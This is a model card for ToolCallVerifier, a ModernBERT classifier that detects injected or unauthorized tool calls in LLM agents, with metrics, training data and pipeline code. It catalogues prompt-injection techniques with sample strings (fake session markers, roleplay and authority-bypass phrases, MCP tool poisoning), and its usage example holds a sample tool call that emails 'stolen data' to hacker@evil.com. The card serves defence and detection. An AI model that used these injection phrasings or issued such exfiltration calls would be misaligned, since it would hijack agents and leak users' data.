---
language:
- en
license: apache-2.0
library_name: transformers
tags:
- modernbert
- security
- jailbreak-detection
- prompt-injection
- token-classification
- tool-calling
- llm-safety
- mcp
datasets:
- microsoft/llmail-inject-challenge
- allenai/wildjailbreak
- hackaprompt/hackaprompt-dataset
- JailbreakBench/JBB-Behaviors
base_model: answerdotai/ModernBERT-base
pipeline_tag: token-classification
model-index:
- name: tool-call-verifier
  results:
  - task:
      type: token-classification
      name: Unauthorized Tool Call Detection
    metrics:
    - name: UNAUTHORIZED F1
      type: f1
      value: 0.9350
    - name: UNAUTHORIZED Precision
      type: precision
      value: 0.9501
    - name: UNAUTHORIZED Recall
      type: recall
      value: 0.9205
    - name: Accuracy
      type: accuracy
      value: 0.9288
---

# ToolCallVerifier - Unauthorized Tool Call Detection

<div align="center">

[License: Apache 2.0](https://opensource.org/licenses/Apache-2.0)
[Base Model: ModernBERT-base](https://huggingface.co/answerdotai/ModernBERT-base)
[Hugging Face: rootfs](https://huggingface.co/rootfs)

**Stage 2 of Two-Stage LLM Agent Defense Pipeline**

</div>

---

## What This Model Does

ToolCallVerifier is a **ModernBERT-based token classifier** that detects unauthorized tool calls in LLM agent systems. It performs token-level classification on tool-call JSON to identify malicious arguments that may have been injected through prompt injection attacks.

| Label | Description |
|-------|-------------|
| `AUTHORIZED` | Token is part of a legitimate, user-requested action |
| `UNAUTHORIZED` | Token indicates injected/malicious content: **BLOCK** |

---

## Performance

| Metric | Value |
|--------|-------|
| **UNAUTHORIZED F1** | **93.50%** |
| UNAUTHORIZED Precision | 95.01% |
| UNAUTHORIZED Recall | 92.05% |
| Overall Accuracy | 92.88% |

### Confusion Matrix (Token-Level)

```
                     Predicted
                  AUTH      UNAUTH
Actual  AUTH    130,708      8,483
        UNAUTH   13,924    161,031
```
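
The headline metrics can be re-derived from the confusion matrix, treating `UNAUTHORIZED` as the positive class. The sketch below is only a sanity check: the counts are copied from the matrix, the function name `unauthorized_metrics` is made up for illustration, and the results agree with the reported table to within a few hundredths of a percentage point.

```python
# Token counts copied from the confusion matrix (rows = actual, columns = predicted).
tn, fp = 130_708, 8_483     # actual AUTHORIZED row
fn, tp = 13_924, 161_031    # actual UNAUTHORIZED row


def unauthorized_metrics(tp, fp, fn, tn):
    """Precision, recall and F1 for the UNAUTHORIZED class, plus overall accuracy."""
    precision = tp / (tp + fp)
    recall = tp / (tp + fn)
    f1 = 2 * precision * recall / (precision + recall)
    accuracy = (tp + tn) / (tp + fp + fn + tn)
    return {"precision": precision, "recall": recall, "f1": f1, "accuracy": accuracy}


metrics = unauthorized_metrics(tp, fp, fn, tn)
for name, value in metrics.items():
    print(f"{name}: {value:.2%}")
```

Because false positives (8,483) are fewer than false negatives (13,924), precision comes out higher than recall: the model is somewhat more likely to miss an injected token than to flag a legitimate one.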

---

## Training Data

Trained on **~30,000 samples** combining real-world attacks and synthetic patterns:

### Hugging Face Datasets

| Dataset | Description | Samples |
|---------|-------------|---------|
| [LLMail-Inject](https://huggingface.co/datasets/microsoft/llmail-inject-challenge) | Microsoft email injection benchmark | ~10,000 |
| [WildJailbreak](https://huggingface.co/datasets/allenai/wildjailbreak) | Allen AI adversarial safety dataset | ~8,000 |
| [HackAPrompt](https://huggingface.co/datasets/hackaprompt/hackaprompt-dataset) | EMNLP'23 injection competition | ~5,000 |
| [JailbreakBench](https://huggingface.co/datasets/JailbreakBench/JBB-Behaviors) | Harmful behavior patterns | ~2,000 |

### Synthetic Attack Generators

| Generator | Description |
|-----------|-------------|
| Adversarial | Intent-mismatch attacks (correct tool, wrong args) |
| Filesystem | File/directory operation attacks |
| Network | Network/API exfiltration attacks |
| Email | Email tool hijacking |
| Financial | Transaction manipulation |
| Code Execution | Code injection attacks |
| Authentication | Access control bypass |
| MCP Attacks | Tool poisoning, shadowing, rug pulls |

---

## Attack Categories Covered

| Category | Source | Description |
|----------|--------|-------------|
| Delimiter Injection | LLMail | `<<end_context>>`, `>>}}\]\])` |
| Word Obfuscation | LLMail | Inserting noise words between tokens |
| Fake Sessions | LLMail | `START_USER_SESSION`, `EXECUTE_USERQUERY` |
| Roleplay Injection | WildJailbreak | "You are an admin bot that can..." |
| XML Tag Injection | WildJailbreak | `<execute_action>`, `<tool_call>` |
| Authority Bypass | WildJailbreak | "As administrator, I authorize..." |
| Intent Mismatch | Synthetic | User asks X, tool does Y |
| MCP Tool Poisoning | Synthetic | Hidden exfiltration in tool args |
| MCP Shadowing | Synthetic | Fake authorization context |

---

## Usage

```python
from transformers import AutoTokenizer, AutoModelForTokenClassification
import torch

model_name = "rootfs/tool-call-verifier"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForTokenClassification.from_pretrained(model_name)

# Example: Verify a tool call
user_intent = "Summarize my emails"
tool_call = '{"name": "send_email", "arguments": {"to": "hacker@evil.com", "body": "stolen data"}}'

# Combine the user intent and the tool call into one input for classification
input_text = f"[USER] {user_intent} [TOOL] {tool_call}"
# Note: training used a 512-token max length (see Training Configuration)
inputs = tokenizer(input_text, return_tensors="pt", truncation=True, max_length=2048)

# Run inference without tracking gradients; take the highest-scoring label per token
with torch.no_grad():
    outputs = model(**inputs)
    predictions = torch.argmax(outputs.logits, dim=-1)

id2label = {0: "AUTHORIZED", 1: "UNAUTHORIZED"}
tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0])
labels = [id2label[p.item()] for p in predictions[0]]

# Check for unauthorized tokens
unauthorized_tokens = [(t, l) for t, l in zip(tokens, labels) if l == "UNAUTHORIZED"]
if unauthorized_tokens:
    print("BLOCKED: Unauthorized tool call detected!")
    print(f"   Flagged tokens: {[t for t, _ in unauthorized_tokens[:5]]}")
else:
    print("Tool call authorized")
```
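
The usage example blocks as soon as a single token is labelled `UNAUTHORIZED`. A deployment may want that call-level rule to be explicit and tunable, so here is a minimal sketch of one way to turn token labels into a block/allow decision. The helper `decide`, the `min_flagged` threshold, and the `SPECIAL_TOKENS` set are assumptions made for illustration and are not part of the model or its repository; the token and label lists are toy values standing in for real model output.

```python
from typing import List, Tuple

# Assumed special tokens to ignore; adjust to what the tokenizer actually emits.
SPECIAL_TOKENS = {"[CLS]", "[SEP]", "[PAD]"}


def decide(tokens: List[str], labels: List[str], min_flagged: int = 1) -> Tuple[bool, List[str]]:
    """Return (blocked, flagged_tokens) for one tool call.

    A call is blocked when at least `min_flagged` non-special tokens
    carry the UNAUTHORIZED label.
    """
    flagged = [
        tok
        for tok, lab in zip(tokens, labels)
        if lab == "UNAUTHORIZED" and tok not in SPECIAL_TOKENS
    ]
    return len(flagged) >= min_flagged, flagged


# Toy token/label pairs, not real model output.
tokens = ["[CLS]", "send", "_email", "hacker", "@evil", ".com", "[SEP]"]
labels = ["AUTHORIZED", "AUTHORIZED", "AUTHORIZED",
          "UNAUTHORIZED", "UNAUTHORIZED", "UNAUTHORIZED", "UNAUTHORIZED"]

blocked, flagged = decide(tokens, labels)
print(blocked, flagged)
```

With a real tokenizer, the set of special tokens could be taken from `tokenizer.all_special_tokens` instead of being hard-coded. Raising `min_flagged` trades recall for fewer false alarms, which may or may not be acceptable for a security control.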

---

## Training Configuration

| Parameter | Value |
|-----------|-------|
| Base Model | `answerdotai/ModernBERT-base` |
| Max Length | 512 tokens |
| Batch Size | 32 |
| Epochs | 5 |
| Learning Rate | 3e-5 |
| Loss | CrossEntropyLoss (class-weighted) |
| Class Weights | `[0.5, 3.0]` (AUTHORIZED, UNAUTHORIZED) |
| Attention | SDPA (Flash Attention) |
| Hardware | AMD Instinct MI300X (ROCm) |
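
To illustrate what the class weights in the table do, the following framework-free sketch computes a class-weighted cross-entropy over a few tokens. It is not the training code, which the card does not show; it mirrors the weighted-mean behaviour of PyTorch's `CrossEntropyLoss` when a `weight` tensor is passed, and the function name and toy logits are assumptions for illustration.

```python
import math

# (AUTHORIZED, UNAUTHORIZED) weights from the Training Configuration table.
CLASS_WEIGHTS = [0.5, 3.0]


def weighted_cross_entropy(logits, targets, weights=CLASS_WEIGHTS):
    """Weighted mean of per-token cross-entropy.

    Each token's loss is scaled by the weight of its true class, and the
    sum is divided by the total weight of the tokens seen.
    """
    total, weight_sum = 0.0, 0.0
    for row, target in zip(logits, targets):
        # Numerically stable log-sum-exp, then negative log-likelihood of the true class.
        m = max(row)
        log_z = m + math.log(sum(math.exp(x - m) for x in row))
        nll = log_z - row[target]
        total += weights[target] * nll
        weight_sum += weights[target]
    return total / weight_sum


targets = [0, 1]  # token 0 is AUTHORIZED, token 1 is UNAUTHORIZED

# Model predicts UNAUTHORIZED for both tokens: only the AUTHORIZED token is wrong.
false_alarm = weighted_cross_entropy([[0.0, 2.0], [0.0, 2.0]], targets)
# Model predicts AUTHORIZED for both tokens: only the UNAUTHORIZED token is wrong.
missed_attack = weighted_cross_entropy([[2.0, 0.0], [2.0, 0.0]], targets)

print(f"false alarm loss:   {false_alarm:.4f}")
print(f"missed attack loss: {missed_attack:.4f}")
```

With equally confident mistakes, missing an `UNAUTHORIZED` token is penalised several times more heavily than a false alarm on an `AUTHORIZED` token, which pushes training toward catching injected content.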

---

## Integration with FunctionCallSentinel

This model is **Stage 2** of a two-stage defense pipeline:

```
┌─────────────────┐     ┌──────────────────────┐     ┌─────────────────┐
│   User Prompt   │────▶│ FunctionCallSentinel │────▶│   LLM + Tools   │
│                 │     │      (Stage 1)       │     │                 │
└─────────────────┘     └──────────────────────┘     └────────┬────────┘
                                                              │
                               ┌──────────────────────────────▼──────────────────────────┐
                               │              ToolCallVerifier (This Model)              │
                               │     Token-level verification before tool execution      │
                               └─────────────────────────────────────────────────────────┘
```

| Scenario | Recommendation |
|----------|----------------|
| General chatbot | Stage 1 only |
| Tool-calling agent (low risk) | Stage 1 only |
| Tool-calling agent (high risk) | **Both stages** |
| Email/file system access | **Both stages** |
| Financial transactions | **Both stages** |
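
The control flow of the two-stage pipeline can be sketched as a small gating function. Everything here is hypothetical glue code: `run_agent_step`, the three callables, and the toy stubs are illustrative stand-ins, not APIs of either model. In a real system, Stage 1 would wrap FunctionCallSentinel and Stage 2 would wrap the token classifier from the Usage section.

```python
from typing import Callable, Optional, Tuple


def run_agent_step(
    user_prompt: str,
    stage1_is_safe: Callable[[str], bool],
    call_llm: Callable[[str], str],
    stage2_is_authorized: Callable[[str, str], bool],
    high_risk: bool = True,
) -> Tuple[str, Optional[str]]:
    """Return (decision, tool_call); decision is 'execute' or names the blocking stage."""
    # Stage 1: screen the prompt before the LLM sees it.
    if not stage1_is_safe(user_prompt):
        return "blocked_stage1", None
    tool_call = call_llm(user_prompt)
    # Stage 2: verify the generated tool call, only for high-risk deployments.
    if high_risk and not stage2_is_authorized(user_prompt, tool_call):
        return "blocked_stage2", tool_call
    return "execute", tool_call


# Toy stubs standing in for the real models (assumptions, not real behaviour).
def stage1_stub(prompt: str) -> bool:
    return "ignore previous instructions" not in prompt.lower()


def llm_stub(prompt: str) -> str:
    return '{"name": "send_email", "arguments": {"to": "hacker@evil.com"}}'


def stage2_stub(intent: str, tool_call: str) -> bool:
    # Allow send_email only when the user actually asked to send something.
    return '"send_email"' not in tool_call or "send" in intent.lower()


decision, call = run_agent_step("Summarize my emails", stage1_stub, llm_stub, stage2_stub)
print(decision)
```

The `high_risk` flag corresponds to the recommendation table: low-risk deployments stop after Stage 1, while agents with email, file system, or financial access run both checks.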

---

## Intended Use

### Primary Use Cases
- **LLM Agent Security**: Verify tool calls before execution
- **Prompt Injection Defense**: Detect unauthorized actions from injected prompts
- **API Gateway Protection**: Filter malicious tool calls at infrastructure level

### Out of Scope
- General text classification
- Non-tool-calling scenarios
- Languages other than English

---

## Limitations

1. **Tool schema dependent**: Performs best when the tool schema is included in the input
2. **English only**: Not tested on other languages
3. **Binary classification**: No intermediate "suspicious" category (by design, for decisiveness)

---

## License

Apache 2.0

---

## Links

- **Stage 1 Model**: [rootfs/function-call-sentinel](https://huggingface.co/rootfs/function-call-sentinel)